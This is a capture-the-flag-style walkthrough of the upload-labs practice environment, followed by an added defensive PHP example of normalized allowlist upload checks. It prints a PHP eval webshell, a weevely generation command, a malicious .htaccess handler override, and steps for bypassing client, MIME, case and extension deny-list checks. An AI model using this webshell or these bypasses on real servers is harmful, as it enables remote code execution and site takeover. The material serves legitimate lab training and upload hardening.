Setup

https://github.com/c0ny1/upload-labs

Pass-01 (client-side check bypass)

Prepare a PHP one-liner webshell:

<?php
phpinfo();
eval($_POST['a']);
?>

Uploading the one-liner as-is triggers the client-side prompt (the extension check runs in the browser).

Rename the extension to png.

Intercept the request in Burp and change the extension back to php.

The upload succeeds; connect to it with Caidao (菜刀).

Generate a webshell with weevely:

┌──(root💀B)-[~]
└─# weevely generate shell /root/1.php
Generated '/root/1.php' with password 'shell' of 774 byte size.


Pass-02 (MIME type bypass)

Clear the previously uploaded files.

Change the Content-Type header of the file part to image/jpeg.

The same procedure as in Pass-01 also uploads successfully here.

Pass-03 (Apache parsing vulnerability)

Uploading the file returns an error:

Message: uploading files with the .asp, .aspx, .php or .jsp extension is not allowed!

So try a different extension, for example php3.

php3 is not parsed as PHP.

Try phtml next.

Also not parsed.

Looked it up; apparently the configuration has to be changed orz.

Edit /etc/mime.types to add the extension, then reload Apache:

service apache2 reload

Now it is parsed successfully.

Update 2021-12-28 15:54:41

No configuration change is needed.

Pass-04 (Apache configuration file .htaccess)

Upload a .htaccess that rewrites the handler mapping so that files matching "jpg" are handled as PHP:

<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>

Pass-05 (case bypass)

Analyze the source:

$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");

The deny list is compared without normalizing case, so only the listed spellings are blocked.

Try the mixed-case extension phP; the upload succeeds and the file is executed.

Pass-06 (trailing space bypass)

The source now normalizes case before comparing:

$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = $_FILES['upload_file']['name'];
$file_name = deldot($file_name);//remove trailing dots from the filename
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //convert to lowercase
$file_ext = str_ireplace('::$DATA', '', $file_ext);//remove the string ::$DATA
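As an added example (not part of this write-up or of upload-labs), the PHP below contrasts a deny-list check in the style of the Pass-05 source with an allowlist check that normalizes the filename first, covering the case, trailing-space, trailing-dot and ::$DATA variants these levels exercise, and stores the file under a server-chosen name so a client-supplied multi-extension name never reaches Apache. The function names are my own for this illustration.

```php
<?php
// Added example, not upload-labs code: deny-list check in the style of the
// Pass-05 source versus an allowlist check that normalizes the name first.
// Function names are the editor's own for this illustration.

// Deny-list check: compares the raw extension against a fixed list, so any
// spelling not literally in the list (other case, trailing space) is not matched.
function weak_is_allowed(string $file_name): bool {
    $deny_ext = array('.php', '.php5', '.phtml', '.htaccess'); // shortened list
    $ext = strrchr($file_name, '.');
    return !in_array($ext, $deny_ext, true);
}

// Normalize the name before looking at the extension: strip any directory part,
// the ::$DATA stream suffix and trailing spaces/dots, then fold case.
function normalized_ext(string $file_name): ?string {
    $name = basename($file_name);
    $name = str_ireplace('::$DATA', '', $name);
    $name = strtolower(rtrim($name, " ."));
    if ($name === '' || $name[0] === '.') {      // reject dotfiles such as .htaccess
        return null;
    }
    $dot = strrpos($name, '.');
    return $dot === false ? null : substr($name, $dot + 1);
}

// Allowlist check: only a few image extensions pass; everything else is rejected.
function hardened_is_allowed(string $file_name): bool {
    $ext = normalized_ext($file_name);
    return $ext !== null && in_array($ext, array('jpg', 'jpeg', 'png', 'gif'), true);
}

// Store under a random server-chosen name with the validated extension, so the
// client-supplied name (including forms like shell.php.jpg) never hits the filesystem.
function stored_name(string $file_name): ?string {
    if (!hardened_is_allowed($file_name)) {
        return null;
    }
    return bin2hex(random_bytes(16)) . '.' . normalized_ext($file_name);
}

// Constructed sample names covering the variants seen in Pass-05 and Pass-06.
$samples = ['pic.jpg', 'shell.phP', 'shell.php ', 'shell.php.', 'shell.php::$DATA', '.htaccess', 'shell.php.jpg'];
foreach ($samples as $n) {
    printf("%-20s weak=%-5s hardened=%-5s stored=%s\n", json_encode($n),
        var_export(weak_is_allowed($n), true), var_export(hardened_is_allowed($n), true),
        stored_name($n) ?? '-');
}
```

Run it with `php` on the command line to compare both checks over the sample names; the allowlist plus rename is what the later levels' checks are reaching for.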